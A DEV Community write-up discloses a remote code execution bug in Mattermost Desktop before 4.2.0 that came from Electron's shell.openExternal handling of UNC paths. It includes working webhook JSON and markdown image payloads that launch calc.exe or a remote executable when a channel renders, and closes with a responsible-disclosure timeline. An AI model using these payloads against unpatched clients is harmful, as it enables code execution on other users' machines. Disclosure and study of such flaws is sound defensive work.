DEV Community

Nathan Lowe
Nathan Lowe

Posted on

3 1

RCE in Mattermost Desktop earlier than 4.2.0

First things first, if you use Mattermost Desktop and aren't already on 4.2.0, you should update immediately.

What a way to end a Monday.

Discovery

Jeff Ziegener and Scott Payne first discovered this while trying to set the profile image for an integration to a UNC path. They discovered that when the integration would post a message, it would open the image at the specified UNC path... in Windows Photo Viewer! After some further digging, we discovered this wasn't limited to just photos. We could open any executable the user had access to on a remote share. We could also make users visit arbitrary web pages in their default browser by setting the integration profile picture to a UNC path to a shortcut. For example, sending the following payload to an incoming webhook produces this result:

{
  "text": "Windows Photo Viewer",
  "username": "Windows Photo Viewer",
  "icon_url": "\\\\some-server\\some-share\\tux.png"
}
Enter fullscreen mode Exit fullscreen mode

Investigation

Further digging indicated that even though UNC Paths to localhost / 127.0.0.1 were blocked, we could open local executables if we knew the machine name of the target user and they had administrative shares enabled. For example, if my machine name is win-01234, I could open a local instance of calc.exe by linking to \\win-01234\c$\windows\system32\calc.exe:

{
  "text": "Calculator!",
  "username": "calc.exe",
  "icon_url": "\\\\win-01234\\c$\\windows\\system32\\calc.exe"
}
Enter fullscreen mode Exit fullscreen mode

Even better, every time you re-render the channel, it'll open all image links that were rendered:

After reporting the bug to mattermost, we discovered that we could reproduce the bug by simply sending a message with a link or an image with a UNC path. Mattermost Desktop will open the link with the default application when clicked, or automaticially when the channel is rendered for image links. This means I can post the following message:

![](\\some-server-you-can-access\some-share\virus.exe)
Enter fullscreen mode Exit fullscreen mode

And mattermost will happily execute the program at that path!

Want to rick-roll everyone in a channel? Make a shortcut people can access:

Details

Versions of the Desktop application prior to 4.2.0 contain a vulnerability in the way certain image links are handled. Given a profile picture or image link with a non-http protocol, if the host segment of the URL doesn't match the regular expression ^localhost$|^127\.0\.0\.1$|^\[::1\]$, the URL is then passed to electron's shell.openExternal(...):

Open the given external protocol URL in the desktop's default manner. (For example, mailto: URLs in the user's default mail agent).

This functionality was removed in c86182.

Disclosure Timeline

  • 2018-10-22: Issue initially discovered by Jeff Ziegener and Scott Payne at Hyland Software
  • 2018-10-23: Issue disclosed to Mattermost per the Responsible Discolsure Policy
  • 2018-10-24: Issue confirmed by Mattermost
  • 2018-10-28: Fix merged to master
  • 2018-11-27: Mattermost Desktop 4.2.0 released with the fix
  • 2019-01-02: Vulnerability details released by Mattermost
  • 2019-01-07: Writeup published

Reinvent your career. Join DEV.

It takes one minute and is worth it for your career.

Get started

Top comments (0)

👋 Kindness is contagious

Dive into an ocean of knowledge with this thought-provoking post, revered deeply within the supportive DEV Community. Developers of all levels are welcome to join and enhance our collective intelligence.

Saying a simple "thank you" can brighten someone's day. Share your gratitude in the comments below!

On DEV, sharing ideas eases our path and fortifies our community connections. Found this helpful? Sending a quick thanks to the author can be profoundly valued.

Okay